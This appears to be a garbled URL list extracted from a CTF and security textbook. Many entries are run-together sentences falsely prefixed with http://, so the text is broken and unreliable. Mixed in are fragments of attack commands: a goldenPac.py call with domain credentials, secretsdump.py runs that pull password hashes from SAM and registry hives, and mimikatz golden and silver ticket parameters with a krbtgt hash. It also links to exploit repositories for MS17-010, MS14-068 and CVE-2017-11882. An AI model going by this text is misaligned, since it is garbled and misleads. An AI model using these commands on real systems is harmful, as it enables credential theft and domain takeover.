http://sshell.art/dex2oat/dex2oat.ccAndroid8.xmakedex2oat//compilationandverication.verication_results_-
-
http://le.cc
-
http://Fig.4.16JEBFig.4.17liban-a.so
-
https://doi.org/10.1007/978-981-19-0336-6_5295
-
http://NTkernelbegantointroduceMinWinafterWindowsVista.ss
-
https://github.com/pwndbg/pwndbg.Youcanseetheinstallationstepsinthe�How�.Afterinstallation,thePwndbgpluginwillbeautomaticallyloadedeverytimeyoustartGDB.2.OpentheleYoucanmakeGDBopensthetargetleinthefollowingthreeways.1:Youcanspecifyanexecutableleintheformof�gdb./2-simpleCrackme�
-
http://visualgdb.com/gdbreference/commands/xforalistofformats.�p
-
http://justrunida_script.py
-
https://github.com/push0ebp/sig-databaseorhttps://github.com/Maktm/FLIRTDB.OryoucanmakeuseoftheFLAIRtoolprovidedwithintheIDASDK,createyourownsignaturebasedonexistingstaticlibraryleslike.a,.lib,etc.,putitinsigfolder,andthenloaditinIDA.FortheuseoftheFLAIRtool,pleaserefertotheInternetforinformation.3.BinarySimilarityDuetodifferencesinvariousways,suchascompilationagsorenvironments,signaturesmaynotmatchtheprovidedlibraryexactly.However,evenifthecompilationenvironmentisdifferent,therearesimilaritiesbetweencompiledlibraryfunctionsinbinariesthatusethesamelibrary.Ifweknowthattheprogrammerusedacertainlibrary,andifwecangetastaticallycompiledbinarylethatcontainsthedebugsymbolsandalsousesthelibrary,wecanusethebinarysimilarityapproachtoidentifyeachlibraryfunction.ApopulartoolforbinarycomparisonisBinDiff
-
https://www.zynamics.com/bindiff.html
-
http://dp.py
-
https://github.com/x64dbg/ScyllaHide
-
https://www.npointer.cn/question.html?id�5
-
http://at.py
-
https://security.tencent.com/index.php/blog/msg/112
-
https://www.hex-rays.com/blog/hex-rays-microcode-api-vs-obfus-cating-compiler/
-
https://kong.re.kr/?p�71.5functionsareimplementedbythistool,includingthesignatureloading,whichisthemostimportant,optimizestheidenticationofRustfunctions,thusreducinganalysistime.Theresultoftherust-reversing-helperoptimizationisshowninFig.5.83.YoucanseethatthefunctionnameintheleftFunctionnamepanelhasbeenoptimized,andwecanstarttoanalyzeitnow.Asageneralruleofthumb,wetendtoanalyzethestd__rt__lang_start_internalfunction.However,unliketheregularchallenges,std__rt__lang_start_internalisRust'sinitializationfunction,whichfunctionsasthestartfunction,andthefunctionbeginer_reverse__mainfunctioncanbefoundabovecallstd__rt__lang_start_internal,soinRust,themainfunctionisusedasanFig.5.82IDAloadRustprogram3805ReverseEngineering
-
http://Thefullpathtothe.py
-
http://simfd.read
-
http://self.state.memory.store
-
http://wecangetgoodresults.2.baby
-
http://sim_options.py
-
http://wesuccessfullyoptimizedthescriptruntimefrom8.461sto7.933s.3.sakura
-
http://simgr.one
-
http://state.memory.store
-
https://software.intel.com/sites/landingpage/pintool/docs/97619/Pin/html/index.html.5.7.3.4CTFPractice:RecordingtheNumberofExecutedInstructionsThissectiondescribeshowtousethisinstructioncountertosolvetheCTFchallenge.ThereversechallengeinCTFcanbeabstractedasthatagiveninputstringag,computedbysomealgorithmftogettheresultenc,andthencomparetheresultencwiththedataembeddedintheprogram.Inthecasethatachangeinsomebytesintheagwillonlyaffectsomebytesintheenc,thenonecanconsiderdividingtheagintomultiplesegments,brute-forceattackingtheinput,andtreatingthealgorithmfFig.5.107CountBblfunctionFig.5.108log.logleFig.5.106Tracefunction5.7ModernReverseEngineeringTechniques407
-
http://www.xuetr.com/?p�191.NotethatalthoughPCHuntersupportsWindows10,theauthorisoftenunabletoupdatethesoftwareontimeduetotherapidpaceofWindows10updates.Asofthiswriting,Windows10hasbeenupdatedtoversion1909,whiletheversionsupportedbyPCHunterisstillat1809.ItisrecommendedthatyoualwayshavealowerversionofWindowsvirtualmachine.
-
https://doi.org/10.1007/978-981-19-0336-6_6429
-
http://abledata.Unlike.data
-
http://libc.search
-
http://libc-2.27.so
-
http://elf.got
-
http://p3pointer.ch
-
https://github.com/pwndbg/pwndbg
-
https://github.com/shellphish/how2heap
-
https://packages.ubuntu.com/xenial/glibc-source
-
https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344
-
http://boot.sh
-
http://ddebs.ubuntu.com/
-
https://wikipedia.org/
-
https://doi.org/10.1007/978-981-19-0336-6_7
-
https://atomcated.github.io/Vigenere/
-
https://github.com/veritas501/attachment_in_blog/tree/master/Gadgetzan
-
http://forcrypto1ofpwnable.kr
-
http://f.read
-
http://functionintheLinuxGNUClibraryisasfollows.int
-
http://functionisimplementedasfollows.int
-
https://github.com/pablocelayes/rsa-wiener-attack
-
https://github.com/mimoo/RSA-and-LLL-attacks
-
http://hashlib.md
-
https://github.com/bwall/HashPump
-
https://github.com/blockstack/secret-sharing
-
https://doi.org/10.1007/978-981-19-0336-6_8
-
https://infura.io
-
http://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258a
-
https://ropsten.infura.io/v3/xxxxx
-
http://tmp_v.to
-
http://Web3.to
-
http://personal.new
-
http://block.transactions.to
-
http://github.com/yuange1024/ethereum_yellowpaper
-
https://github.com/Hcamael/ethre_source/blob/master/hctf2018.sol
-
http://eth.call
-
https://doi.org/10.1007/978-981-19-0336-6_9
-
http://Image.open
-
http://breakimg.save
-
https://www.wireshark.org
-
http://wireshark.org/docs/man-pages/tshark.html
-
http://usb.org/sites/default/files/documents/hut1_12v2.pdf
-
https://usb.org/sites/default/files/documents/hid1_11.pdf
-
https://github.com/superponible/volatility-plugins
-
https://doi.org/10.1007/978-981-19-0336-6_10
-
https://xdebug.org/download.php
-
https://xdebug.org/wizard.php
-
http://makesurethattheuserwhothePHPwillberunningashaswritepermissionstothatdirectory.xdebug.pro
-
http://xdebug.pro
-
http://Onxdebug.auto
-
http://www.thinkphp.cn/down/1279.html
-
http://Getrequestvariablesautomatically.case
-
http://xxxxxx.com/download/file?name=test.docx&path=upload/doc/test.docx
-
https://github.com/sco4x0/huwangbei2018_easy_laravel
-
https://github.com/qqqqqqvq/easy_laravel
-
http://qvq.im
-
https://the.bytecode.club/showthread.php?tid=5
-
http://importjava.io
-
http://itrequirestheexistenceofaparameter-freeconstructorintheparentclass.Therelevantinterfacesandclassesareasfollows.java.io.Serializablejava.io
-
http://todeserializetheobject.objectInputStream.read
-
http://meansthatboththeclassitselfanditssubclassescanbeserializedwiththeJDK.Forexample.importjava.io
-
http://objectInputStream.read
-
http://inwhichcasetheprogramwillraiseajava.io
-
http://this.name
-
http://this.group
-
http://this.id
-
http://chain.do
-
http://returnois.read
-
http://returnbos.to
-
http://copytheToolsandClientinfocodeintoTools.javaandClientinfo.java
-
http://baseClass.is
-
https://jira.jboss.org/jira/browse/RF-8064
-
https://xz.aliyun.com/t/3264
-
http://Calculator.app
-
http://o.to
-
http://contentType.to
-
http://bf.read
-
http://AttacklimitsOraclehassetcom.sun.jndi.rmi.object.trust
-
http://decodeObjectfromaremotelocation.Oraclesetscom.sun.jndi.ldap.object.trust
-
http://www.veracode.com/blog/research/exploiting-jndi-injections-java
-
http://github.com/apache/shiro.git
-
http://shiro.rrjva1.ceye.io
-
http://popen.stdout.read
-
https://doi.org/10.1007/978-981-19-0336-6_11
-
https://github.com/wupco/weblogger
-
http://session.save
-
https://doi.org/10.1007/978-981-19-0336-6_12
-
https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
-
http://nmap.org/book/inst-source.html
-
https://github.com/rofl0r/proxychains-ng.git
-
https://github.com/vanhauser-thc/thc-hydra
-
https://github.com/Dliv3/Venom
-
https://github.com/Dliv3/Venom/releases/download/v1.0.2/Venom.v1.0.2.7z
-
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
-
http://pythongoldenPac.pyweb.lctf.com/buguake:xdsec@lctf2018@sub-dc.web.lctf.com-dc-ip172.21.0.7-target-ip172.21.0.7cmd
-
https://github.com/worawit/MS17-010
-
https://docs.microsoft.com/en-us/sysinternals/downloads/autologon
-
http://sam.save
-
http://security.save
-
http://system.save
-
http://examplesfolderandloadthemusingtheImpacketsecretsdumpscript.secretsdump.py-samsam.save-securitysecurity.save-systemsystem.save
-
https://docs.microsoft.com/en-us/windows/desktop/secauthn/lsa-authentication
-
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
-
http://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
-
http://whichcanbeusedtomaintainpermissionsinsubsequentstages.Therearetwowaystoretrievestoredidentitycredentials.1.RemoteextractionUsethesecretsdump.pyscriptfromimpackettoextractthepasswordhashremotelyviadcsyncwiththefollowingcommand.secretsdump.py
-
https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1
-
http://pythonsecretsdump.py
-
http://system.hiv
-
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html
-
http://scanf.com/user:krbtgt
-
http://scanf.com/sid:sid/krbtgt:hash/endin:480/renewmax:10080/ptt
-
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
-
http://scanf.com/sid:S-1-5-21-2256421489-3054245480-2050417719/target:DC.scanf.com/sid:S-1-5-21-2256421489-3054245480-2050417719rc4:83799921ccee1abbdeac4e9070614e7/service:cifs/ptt
-
https://adsecurity.org/?p=2011
-
https://adsecurity.org/?p=1640
-
https://adsecurity.org/?p=1515
-
http://les.pythonCVE-2017-11882.py
-
http://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
-